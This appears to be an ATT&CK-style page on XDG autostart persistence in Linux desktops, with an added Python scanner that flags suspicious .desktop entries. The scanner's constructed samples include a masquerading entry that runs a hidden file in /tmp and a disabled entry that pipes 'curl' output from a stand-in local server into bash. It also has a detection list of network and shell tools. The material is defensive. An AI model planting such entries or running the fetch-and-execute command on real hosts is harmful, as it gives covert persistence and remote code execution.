T1547.013 XDG Autostart Entries
Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries allow an application to start automatically when the desktop environment starts after user logon. By default, per-user XDG autostart entries are stored in the ~/.config/autostart directory (more precisely $XDG_CONFIG_HOME/autostart), system-wide entries under /etc/xdg/autostart ($XDG_CONFIG_DIRS/autostart), and both use the .desktop file extension.
Within an XDG autostart entry file, the Type key specifies whether the entry is an application (type 1, written as Type=Application), a link (type 2, Type=Link) or a directory (type 3, Type=Directory); autostart entries are Application entries. The Name key holds an arbitrary name assigned by the creator, and the Exec key holds the program and command line arguments to execute.
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries will execute after user logon in the context of the currently logged-on user. Adversaries may also use Masquerading to make XDG autostart entries look as if they are associated with legitimate programs.
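The following scanner is an added example for this page (not MITRE or any vendor's code). It walks the autostart directories in the precedence order the XDG Autostart specification defines, parses each .desktop file's Type, Exec and Hidden keys, and flags entries whose Exec line looks like a persistence payload: an inline shell command (sh -c), a program in a world-writable staging directory, a hidden dot path, or a download/decoding tool. The three sample entries and the heuristics are constructed assumptions, not indicators from the procedure examples.

```python
"""Scan XDG autostart directories and flag .desktop entries that look like
persistence. Added example for this page, not MITRE or any vendor code; the
three sample entries are constructed and the heuristics are assumptions."""
import configparser
import os
import re
import shlex
from pathlib import Path

# Precedence order from the XDG Autostart spec: $XDG_CONFIG_HOME/autostart
# first, then each directory in $XDG_CONFIG_DIRS/autostart (default /etc/xdg).
def autostart_dirs(env=None):
    env = os.environ if env is None else env
    cfg_home = env.get("XDG_CONFIG_HOME") or os.path.join(env.get("HOME", ""), ".config")
    cfg_dirs = env.get("XDG_CONFIG_DIRS") or "/etc/xdg"
    return [os.path.join(cfg_home, "autostart")] + [
        os.path.join(d, "autostart") for d in cfg_dirs.split(":") if d]

def parse_desktop_entry(text):
    """Return the [Desktop Entry] group as a dict with case-sensitive keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str          # keep 'Exec', do not lowercase to 'exec'
    cp.read_string(text)          # interpolation=None: Exec may contain %u, %f ...
    if not cp.has_section("Desktop Entry"):
        raise ValueError("missing [Desktop Entry] group")
    return dict(cp.items("Desktop Entry"))

FIELD_CODE = re.compile(r"%[a-zA-Z%]")          # %f, %u, %c ... expanded by the launcher
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
FETCH_TOOLS = {"curl", "wget", "nc", "ncat", "socat", "base64"}

def is_ignored(entry):
    """A compliant desktop skips entries with Hidden=true (it also skips ones
    whose TryExec binary is not on PATH; that check is omitted here)."""
    return entry.get("Hidden", "false").strip().lower() == "true"

def exec_argv(entry):
    """Exec with field codes removed, split the way the launcher would."""
    return shlex.split(FIELD_CODE.sub("", entry.get("Exec", "")))

def suspicion_reasons(entry):
    reasons = []
    if entry.get("Type", "").strip() != "Application":
        reasons.append("Type is not Application")
    argv = exec_argv(entry)
    if not argv:
        return reasons + ["no Exec command"]
    if os.path.basename(argv[0]) in INTERPRETERS and "-c" in argv[1:]:
        reasons.append("inline command passed to %s -c" % os.path.basename(argv[0]))
    if any(a.startswith(STAGING_DIRS) for a in argv):
        reasons.append("runs from a world-writable staging directory")
    if any(re.search(r"/\.[^/.]", a) for a in argv):
        reasons.append("references a hidden (dot) path")
    # Look inside quoted shell snippets too, e.g. sh -c "curl ... | bash".
    words = {os.path.basename(w) for a in argv for w in re.split(r"[\s;|&()]+", a) if w}
    if words & FETCH_TOOLS:
        reasons.append("invokes a download or decoding tool")
    return reasons

def scan_entries(named_texts):
    """named_texts: iterable of (file name, file contents). Returns one finding
    per entry worth a look; 'active' is False when the desktop would ignore it."""
    findings = []
    for name, text in named_texts:
        try:
            entry = parse_desktop_entry(text)
        except (ValueError, configparser.Error) as exc:
            findings.append({"file": name, "active": False, "reasons": ["unparseable: %s" % exc]})
            continue
        reasons = suspicion_reasons(entry)
        if reasons:
            findings.append({"file": name, "active": not is_ignored(entry), "reasons": reasons})
    return findings

def scan_dirs(dirs=None):
    """Scan the host's autostart dirs; a file name seen in an earlier (higher
    precedence) directory shadows the same name in a later one."""
    seen, entries = set(), []
    for d in dirs or autostart_dirs():
        for f in (sorted(Path(d).glob("*.desktop")) if Path(d).is_dir() else []):
            if f.name not in seen:
                seen.add(f.name)
                entries.append((str(f), f.read_text(errors="replace")))
    return scan_entries(entries)

# Constructed samples (not taken from any real malware or distribution).
BENIGN = """[Desktop Entry]
Type=Application
Name=Network Manager Applet
Exec=nm-applet
Comment=Control your network connections
"""
MASQUERADE = """[Desktop Entry]
Type=Application
Name=dbus-notifier
Exec=/bin/sh -c "/tmp/.cache/update %u"
NoDisplay=true
"""
DISABLED = """[Desktop Entry]
Type=Application
Name=Old updater
Exec=/bin/bash -c "curl -s http://127.0.0.1:8000/x | bash"
Hidden=true
"""

if __name__ == "__main__":
    for f in scan_dirs():
        print(f["file"], "(active)" if f["active"] else "(ignored)", "; ".join(f["reasons"]))
```

Run it as the logged-on user to cover that user's ~/.config/autostart as well as /etc/xdg/autostart. Hidden=true entries are still reported (marked ignored) because an adversary can flip that flag later without creating a new file; on a real host, compare the findings against package-owned files and a known-good baseline rather than treating every hit as malicious.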
Other sub-techniques of T1547: T1547.001, T1547.002, T1547.003, T1547.004, T1547.005, T1547.006, T1547.007, T1547.008, T1547.009, T1547.010, T1547.012, T1547.013, T1547.014, T1547.015
Created: 10 September 2019
Last Modified: 10 November 2020
Procedure Examples
Fysbis: Fysbis has installed itself as an autostart entry under ~/.config/autostart/dbus-inotifier.desktop to establish persistence.
NETWIRE: NETWIRE can use XDG Autostart Entries to establish persistence.